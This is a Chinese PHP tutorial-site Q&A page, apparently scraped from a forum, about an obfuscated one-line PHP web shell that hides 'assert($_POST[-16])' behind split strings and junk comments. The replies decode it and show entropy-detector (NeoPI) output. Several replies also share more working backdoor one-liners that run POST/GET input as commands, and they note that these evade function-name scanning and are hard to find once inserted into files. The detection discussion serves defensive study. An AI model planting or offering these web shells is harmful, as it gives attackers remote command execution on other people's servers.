一个有意思的 PHP 一句话后门，怎么破？-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

一个有意思的 PHP 一句话后门，怎么破？

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 06, 2016 pm 04:43 PM

gtltosphp

看到一个有意思的php一句话：

<span class="cp"><?php </span>                  
<span class="o">@</span><span class="nv">$_</span><span class="o">=</span><span class="s2">"s"</span><span class="o">.</span><span class="s2">"s"</span><span class="o">./*-/*-*/</span><span class="s2">"e"</span><span class="o">./*-/*-*/</span><span class="s2">"r"</span><span class="p">;</span>                  
<span class="o">@</span><span class="nv">$_</span><span class="o">=/*-/*-*/</span><span class="s2">"a"</span><span class="o">./*-/*-*/</span><span class="nv">$_</span><span class="o">./*-/*-*/</span><span class="s2">"t"</span><span class="p">;</span>                  
<span class="o">@</span><span class="nv">$_</span><span class="cm">/*-/*-*/</span><span class="p">(</span><span class="err">$</span><span class="cm">/*-/*-*/</span><span class="p">{</span><span class="s2">"_P"</span><span class="o">./*-/*-*/</span><span class="s2">"OS"</span><span class="o">./*-/*-*/</span><span class="s2">"T"</span><span class="p">}</span>                  
<span class="p">[</span><span class="cm">/*-/*-*/</span><span class="mi">0</span><span class="cm">/*-/*-*/</span><span class="o">-/*-/*-*/</span><span class="mi">11</span><span class="cm">/*-/*-*/</span><span class="o">-/*-/*-*/</span><span class="mi">5</span><span class="cm">/*-/*-*/</span><span class="p">]);</span><span class="cp">?></span><span class="x"></span>
</span>

回复内容：

assert($_POST[-16]);
?> 我觉得题主应该是问的密码是多少吧，这个一句话后面注释全部去掉之后，POST数组的key其实是一个算术运算

0-11-5

这一点也谈不上新奇，也谈不上是我见过的最变态的PHP后门。

如果有服务器权限，可以扫描文件的话（作为管理员没道理不行吧？），这类后门会被一类使用统计方法（计算包括信息熵、Index of Coincidence在内的一系列统计指标）的检测工具直接干爆。给一个很简单的例子：Neohapsis/NeoPI · GitHub

使用这个Python脚本检查这个文件：

[[ Average IC for Search ]]
0.139386719155

[[ Top 10 lowest IC files ]]
  0.1394        ./test/test.php

[[ Top 10 entropic files for a given search ]]
  3.5443        ./test/test.php

[[ Top 10 longest word files ]]
      60        ./test/test.php

[[ Top 10 signature match counts ]]
       0        ./test/test.php

[[ Top 10 SUPER-signature match counts (These are usually bad!) ]]
       0        ./test/test.php

[[ Top cumulative ranked files ]]
       5        ./test/test.php

/*-/*-*/ 注释 ：）

作为一个看了一年后门的人，已经能分清一句话是公是母了，这种马确实不太奇怪,
我觉得比较有意思的一句话后门有
echo `$_GET['id']` //插在文件中比较难发现
?>

<span class="cp"><?php</span> <span class="p">(</span><span class="nv">$_</span><span class="o">=</span><span class="nv">$I</span><span class="o">.</span><span class="nv">$_GET</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span><span class="o">.</span><span class="nv">$_</span><span class="p">(</span><span class="nv">$I</span><span class="o">.</span><span class="nv">$_POST</span><span class="p">[</span><span class="mi">4</span><span class="p">])</span><span class="cp">?></span><span class="x"> 据说PKAV大牛最近写了个生成这种后门的网页</span>

<span class="cp"><?php</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'s'</span><span class="p">](</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">]);</span><span class="c1">//躲避函数名查杀</span>
<span class="cp">?></span><span class="x"></span>

<span class="x">还有用inlude调用图片的马</span>

仅仅是字符拆分，躲避关键函数名查杀。

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn